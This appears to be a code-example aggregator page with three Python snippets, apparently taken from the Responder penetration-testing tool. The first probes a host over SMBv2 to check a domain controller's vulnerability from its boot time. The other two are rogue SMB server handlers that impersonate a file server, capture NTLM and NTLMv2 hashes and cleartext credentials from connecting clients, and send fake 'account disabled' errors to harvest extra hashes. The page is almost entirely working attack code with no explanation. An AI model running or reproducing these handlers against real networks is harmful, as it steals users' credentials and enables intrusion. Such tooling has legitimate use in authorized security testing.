Ejemplo n.º 1
0
def run(host):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(host)
    s.settimeout(5)

    Header = SMB2Header(Cmd="\x72", Flag1="\x18", Flag2="\x53\xc8")
    Nego = SMB2Nego(Data=SMB2NegoData())
    Nego.calculate()

    Packet = str(Header) + str(Nego)
    Buffer = struct.pack(">i", len(Packet)) + Packet
    s.send(Buffer)

    try:
        data = s.recv(1024)
        if data[4:5] == "\xff":
            print "This host doesn't support SMBv2"
        if data[4:5] == "\xfe":
            IsDCVuln(GetBootTime(data[116:124]))
    except Exception:
        s.close()
        raise
Ejemplo n.º 2
0
    def handle(self):
        try:
            self.ntry = 0
            while True:
                data = self.request.recv(1024)
                self.request.settimeout(1)
                Challenge = RandomChallenge()

                if not data:
                    break

                if data[0] == "\x81":  #session request 139
                    Buffer = "\x82\x00\x00\x00"
                    try:
                        self.request.send(Buffer)
                        data = self.request.recv(1024)
                    except:
                        raise
                        pass

##Negotiate proto answer SMBv2.
                if data[8:10] == b"\x72\x00" and re.search(
                        b"SMB 2.\?\?\?", data):
                    head = SMB2Header(CreditCharge="\x00\x00",
                                      Credits="\x01\x00")
                    t = SMB2NegoAns()
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = StructPython2or3('>i',
                                               str(packet1)) + str(packet1)
                    self.request.send(NetworkSendBufferPython2or3(buffer1))
                    data = self.request.recv(1024)

## Session Setup 1 answer SMBv2.
                if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
                    head = SMB2Header(
                        MessageId=GrabMessageID(data).decode('latin-1'),
                        PID="\xff\xfe\x00\x00",
                        CreditCharge=GrabCreditCharged(data).decode('latin-1'),
                        Credits=GrabCreditRequested(data).decode('latin-1'))
                    t = SMB2NegoAns(Dialect="\x10\x02")
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = StructPython2or3('>i',
                                               str(packet1)) + str(packet1)
                    self.request.send(NetworkSendBufferPython2or3(buffer1))
                    data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
                if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
                    head = SMB2Header(
                        Cmd="\x01\x00",
                        MessageId=GrabMessageID(data).decode('latin-1'),
                        PID="\xff\xfe\x00\x00",
                        CreditCharge=GrabCreditCharged(data).decode('latin-1'),
                        Credits=GrabCreditRequested(data).decode('latin-1'),
                        SessionID=GrabSessionID(data).decode('latin-1'),
                        NTStatus="\x16\x00\x00\xc0")
                    t = SMB2Session1Data(
                        NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(
                            Challenge))
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = StructPython2or3('>i',
                                               str(packet1)) + str(packet1)
                    self.request.send(NetworkSendBufferPython2or3(buffer1))
                    data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
                if data[16:18] == b'\x01\x00' and GrabMessageID(
                        data)[0:1] == b'\x02' and data[4:5] == b'\xfe':
                    ParseSMBHash(data, self.client_address[0], Challenge)
                    head = SMB2Header(
                        Cmd="\x01\x00",
                        MessageId=GrabMessageID(data).decode('latin-1'),
                        PID="\xff\xfe\x00\x00",
                        CreditCharge=GrabCreditCharged(data).decode('latin-1'),
                        Credits=GrabCreditRequested(data).decode('latin-1'),
                        NTStatus="\x22\x00\x00\xc0",
                        SessionID=GrabSessionID(data).decode('latin-1'))
                    t = SMB2Session2Data()
                    packet1 = str(head) + str(t)
                    buffer1 = StructPython2or3('>i',
                                               str(packet1)) + str(packet1)
                    self.request.send(NetworkSendBufferPython2or3(buffer1))
                    data = self.request.recv(1024)

# Negotiate Protocol Response smbv1
                if data[8:10] == b'\x72\x00' and data[
                        4:5] == b'\xff' and re.search(b'SMB 2.\?\?\?',
                                                      data) == None:
                    Header = SMBHeader(
                        cmd="\x72",
                        flag1="\x88",
                        flag2="\x01\xc8",
                        pid=pidcalc(NetworkRecvBufferPython2or3(data)),
                        mid=midcalc(NetworkRecvBufferPython2or3(data)))
                    Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(
                        NetworkRecvBufferPython2or3(data)))
                    Body.calculate()

                    packet1 = str(Header) + str(Body)
                    Buffer = StructPython2or3('>i',
                                              str(packet1)) + str(packet1)

                    self.request.send(NetworkSendBufferPython2or3(Buffer))
                    data = self.request.recv(1024)

                if data[8:10] == b"\x73\x00" and data[
                        4:5] == b"\xff":  # Session Setup AndX Request smbv1
                    IsNT4ClearTxt(data, self.client_address[0])

                    # STATUS_MORE_PROCESSING_REQUIRED
                    Header = SMBHeader(
                        cmd="\x73",
                        flag1="\x88",
                        flag2="\x01\xc8",
                        errorcode="\x16\x00\x00\xc0",
                        uid=chr(randrange(256)) + chr(randrange(256)),
                        pid=pidcalc(NetworkRecvBufferPython2or3(data)),
                        tid="\x00\x00",
                        mid=midcalc(NetworkRecvBufferPython2or3(data)))
                    if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
                        Body = SMBSession1Data(
                            NTLMSSPNtServerChallenge=
                            NetworkRecvBufferPython2or3(Challenge),
                            NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
                    else:
                        Body = SMBSession1Data(
                            NTLMSSPNtServerChallenge=
                            NetworkRecvBufferPython2or3(Challenge))
                    Body.calculate()

                    packet1 = str(Header) + str(Body)
                    Buffer = StructPython2or3('>i',
                                              str(packet1)) + str(packet1)

                    self.request.send(NetworkSendBufferPython2or3(Buffer))
                    data = self.request.recv(1024)

                    if data[8:10] == b"\x73\x00" and data[
                            4:5] == b"\xff":  # STATUS_SUCCESS
                        if Is_Anonymous(data):
                            Header = SMBHeader(
                                cmd="\x73",
                                flag1="\x98",
                                flag2="\x01\xc8",
                                errorcode="\x72\x00\x00\xc0",
                                pid=pidcalc(data),
                                tid="\x00\x00",
                                uid=uidcalc(NetworkRecvBufferPython2or3(data)),
                                mid=midcalc(NetworkRecvBufferPython2or3(data))
                            )  ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
                            Body = SMBSessEmpty()

                            packet1 = str(Header) + str(Body)
                            Buffer = StructPython2or3(
                                '>i', str(packet1)) + str(packet1)

                            self.request.send(
                                NetworkSendBufferPython2or3(Buffer))

                        else:
                            # Parse NTLMSSP_AUTH packet
                            ParseSMBHash(data, self.client_address[0],
                                         Challenge)

                            if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
                                # Send ACCOUNT_DISABLED to get multiple hashes if there are any
                                Header = SMBHeader(
                                    cmd="\x73",
                                    flag1="\x98",
                                    flag2="\x01\xc8",
                                    errorcode="\x72\x00\x00\xc0",
                                    pid=pidcalc(
                                        NetworkRecvBufferPython2or3(data)),
                                    tid="\x00\x00",
                                    uid=uidcalc(
                                        NetworkRecvBufferPython2or3(data)),
                                    mid=midcalc(
                                        NetworkRecvBufferPython2or3(data))
                                )  ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
                                Body = SMBSessEmpty()

                                packet1 = str(Header) + str(Body)
                                Buffer = StructPython2or3(
                                    '>i', str(packet1)) + str(packet1)

                                self.request.send(
                                    NetworkSendBufferPython2or3(Buffer))
                                self.ntry += 1
                                continue

                            # Send STATUS_SUCCESS
                            Header = SMBHeader(
                                cmd="\x73",
                                flag1="\x98",
                                flag2="\x01\xc8",
                                errorcode="\x00\x00\x00\x00",
                                pid=pidcalc(NetworkRecvBufferPython2or3(data)),
                                tid=tidcalc(NetworkRecvBufferPython2or3(data)),
                                uid=uidcalc(NetworkRecvBufferPython2or3(data)),
                                mid=midcalc(NetworkRecvBufferPython2or3(data)))
                            Body = SMBSession2Accept()
                            Body.calculate()

                            packet1 = str(Header) + str(Body)
                            Buffer = StructPython2or3(
                                '>i', str(packet1)) + str(packet1)

                            self.request.send(
                                NetworkSendBufferPython2or3(Buffer))
                            data = self.request.recv(1024)

                if data[8:10] == b"\x75\x00" and data[
                        4:5] == b"\xff":  # Tree Connect AndX Request
                    ParseShare(data)
                    Header = SMBHeader(
                        cmd="\x75",
                        flag1="\x88",
                        flag2="\x01\xc8",
                        errorcode="\x00\x00\x00\x00",
                        pid=pidcalc(NetworkRecvBufferPython2or3(data)),
                        tid=chr(randrange(256)) + chr(randrange(256)),
                        uid=uidcalc(data),
                        mid=midcalc(NetworkRecvBufferPython2or3(data)))
                    Body = SMBTreeData()
                    Body.calculate()

                    packet1 = str(Header) + str(Body)
                    Buffer = StructPython2or3('>i',
                                              str(packet1)) + str(packet1)

                    self.request.send(NetworkSendBufferPython2or3(Buffer))
                    data = self.request.recv(1024)
        except:
            pass
Ejemplo n.º 3
0
    def handle(self):
        try:
            self.ntry = 0
            while True:
                data = self.request.recv(1024)
                self.request.settimeout(1)

                if not data:
                    break

                if data[0] == "\x81":  #session request 139
                    Buffer = "\x82\x00\x00\x00"
                    try:
                        self.request.send(Buffer)
                        data = self.request.recv(1024)
                    except:
                        pass

##Negotiate proto answer SMBv2.
                if data[8:10] == "\x72\x00" and re.search(
                        "SMB 2.\?\?\?", data):
                    head = SMB2Header(CreditCharge="\x00\x00",
                                      Credits="\x01\x00")
                    t = SMB2NegoAns()
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = struct.pack(">i", len(
                        ''.join(packet1))) + packet1
                    self.request.send(buffer1)
                    data = self.request.recv(1024)
## Session Setup 1 answer SMBv2.
                if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
                    head = SMB2Header(MessageId=GrabMessageID(data),
                                      PID="\xff\xfe\x00\x00",
                                      CreditCharge=GrabCreditCharged(data),
                                      Credits=GrabCreditRequested(data))
                    t = SMB2NegoAns(Dialect="\x10\x02")
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = struct.pack(">i", len(
                        ''.join(packet1))) + packet1
                    self.request.send(buffer1)
                    data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
                if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
                    head = SMB2Header(Cmd="\x01\x00",
                                      MessageId=GrabMessageID(data),
                                      PID="\xff\xfe\x00\x00",
                                      CreditCharge=GrabCreditCharged(data),
                                      Credits=GrabCreditRequested(data),
                                      SessionID=GrabSessionID(data),
                                      NTStatus="\x16\x00\x00\xc0")
                    t = SMB2Session1Data()
                    t.calculate()
                    packet1 = str(head) + str(t)
                    buffer1 = struct.pack(">i", len(
                        ''.join(packet1))) + packet1
                    self.request.send(buffer1)
                    data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
                if data[16:18] == "\x01\x00" and GrabMessageID(
                        data)[0:1] == "\x02" and data[4:5] == "\xfe":
                    ParseSMB2NTLMv2Hash(data, self.client_address[0])
                    head = SMB2Header(Cmd="\x01\x00",
                                      MessageId=GrabMessageID(data),
                                      PID="\xff\xfe\x00\x00",
                                      CreditCharge=GrabCreditCharged(data),
                                      Credits=GrabCreditRequested(data),
                                      NTStatus="\x22\x00\x00\xc0",
                                      SessionID=GrabSessionID(data))
                    t = SMB2Session2Data()
                    packet1 = str(head) + str(t)
                    buffer1 = struct.pack(">i", len(
                        ''.join(packet1))) + packet1
                    self.request.send(buffer1)
                    data = self.request.recv(1024)

# Negotiate Protocol Response smbv1
                if data[8:10] == "\x72\x00" and data[
                        4:5] == "\xff" and re.search("SMB 2.\?\?\?",
                                                     data) == None:
                    Header = SMBHeader(cmd="\x72",
                                       flag1="\x88",
                                       flag2="\x01\xc8",
                                       pid=pidcalc(data),
                                       mid=midcalc(data))
                    Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
                    Body.calculate()

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                if data[8:10] == "\x73\x00" and data[
                        4:5] == "\xff":  # Session Setup AndX Request smbv1
                    IsNT4ClearTxt(data, self.client_address[0])

                    # STATUS_MORE_PROCESSING_REQUIRED
                    Header = SMBHeader(cmd="\x73",
                                       flag1="\x88",
                                       flag2="\x01\xc8",
                                       errorcode="\x16\x00\x00\xc0",
                                       uid=chr(randrange(256)) +
                                       chr(randrange(256)),
                                       pid=pidcalc(data),
                                       tid="\x00\x00",
                                       mid=midcalc(data))
                    if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
                        Body = SMBSession1Data(
                            NTLMSSPNtServerChallenge=settings.Config.Challenge,
                            NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
                    else:
                        Body = SMBSession1Data(
                            NTLMSSPNtServerChallenge=settings.Config.Challenge)
                    Body.calculate()

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                    if data[8:10] == "\x73\x00" and data[
                            4:5] == "\xff":  # STATUS_SUCCESS
                        if Is_Anonymous(data):
                            Header = SMBHeader(
                                cmd="\x73",
                                flag1="\x98",
                                flag2="\x01\xc8",
                                errorcode="\x72\x00\x00\xc0",
                                pid=pidcalc(data),
                                tid="\x00\x00",
                                uid=uidcalc(data),
                                mid=midcalc(data)
                            )  ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
                            Body = SMBSessEmpty()

                            Packet = str(Header) + str(Body)
                            Buffer = struct.pack(">i", len(
                                ''.join(Packet))) + Packet

                            self.request.send(Buffer)

                        else:
                            # Parse NTLMSSP_AUTH packet
                            ParseSMBHash(data, self.client_address[0])

                            if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
                                # Send ACCOUNT_DISABLED to get multiple hashes if there are any
                                Header = SMBHeader(
                                    cmd="\x73",
                                    flag1="\x98",
                                    flag2="\x01\xc8",
                                    errorcode="\x72\x00\x00\xc0",
                                    pid=pidcalc(data),
                                    tid="\x00\x00",
                                    uid=uidcalc(data),
                                    mid=midcalc(data)
                                )  ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
                                Body = SMBSessEmpty()

                                Packet = str(Header) + str(Body)
                                Buffer = struct.pack(">i", len(
                                    ''.join(Packet))) + Packet

                                self.request.send(Buffer)
                                self.ntry += 1
                                continue

                            # Send STATUS_SUCCESS
                            Header = SMBHeader(cmd="\x73",
                                               flag1="\x98",
                                               flag2="\x01\xc8",
                                               errorcode="\x00\x00\x00\x00",
                                               pid=pidcalc(data),
                                               tid=tidcalc(data),
                                               uid=uidcalc(data),
                                               mid=midcalc(data))
                            Body = SMBSession2Accept()
                            Body.calculate()

                            Packet = str(Header) + str(Body)
                            Buffer = struct.pack(">i", len(
                                ''.join(Packet))) + Packet

                            self.request.send(Buffer)
                            data = self.request.recv(1024)

                if data[8:10] == "\x75\x00" and data[
                        4:5] == "\xff":  # Tree Connect AndX Request
                    ParseShare(data)
                    Header = SMBHeader(cmd="\x75",
                                       flag1="\x88",
                                       flag2="\x01\xc8",
                                       errorcode="\x00\x00\x00\x00",
                                       pid=pidcalc(data),
                                       tid=chr(randrange(256)) +
                                       chr(randrange(256)),
                                       uid=uidcalc(data),
                                       mid=midcalc(data))
                    Body = SMBTreeData()
                    Body.calculate()

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                if data[8:10] == "\x71\x00" and data[
                        4:5] == "\xff":  #Tree Disconnect
                    Header = SMBHeader(cmd="\x71",
                                       flag1="\x98",
                                       flag2="\x07\xc8",
                                       errorcode="\x00\x00\x00\x00",
                                       pid=pidcalc(data),
                                       tid=tidcalc(data),
                                       uid=uidcalc(data),
                                       mid=midcalc(data))
                    Body = "\x00\x00\x00"

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                if data[8:10] == "\xa2\x00" and data[
                        4:5] == "\xff":  #NT_CREATE Access Denied.
                    Header = SMBHeader(cmd="\xa2",
                                       flag1="\x98",
                                       flag2="\x07\xc8",
                                       errorcode="\x22\x00\x00\xc0",
                                       pid=pidcalc(data),
                                       tid=tidcalc(data),
                                       uid=uidcalc(data),
                                       mid=midcalc(data))
                    Body = "\x00\x00\x00"

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                if data[8:10] == "\x25\x00" and data[
                        4:5] == "\xff":  # Trans2 Access Denied.
                    Header = SMBHeader(cmd="\x25",
                                       flag1="\x98",
                                       flag2="\x07\xc8",
                                       errorcode="\x22\x00\x00\xc0",
                                       pid=pidcalc(data),
                                       tid=tidcalc(data),
                                       uid=uidcalc(data),
                                       mid=midcalc(data))
                    Body = "\x00\x00\x00"

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

                if data[8:10] == "\x74\x00" and data[4:5] == "\xff":  # LogOff
                    Header = SMBHeader(cmd="\x74",
                                       flag1="\x98",
                                       flag2="\x07\xc8",
                                       errorcode="\x22\x00\x00\xc0",
                                       pid=pidcalc(data),
                                       tid=tidcalc(data),
                                       uid=uidcalc(data),
                                       mid=midcalc(data))
                    Body = "\x02\xff\x00\x27\x00\x00\x00"

                    Packet = str(Header) + str(Body)
                    Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

                    self.request.send(Buffer)
                    data = self.request.recv(1024)

        except socket.error:
            pass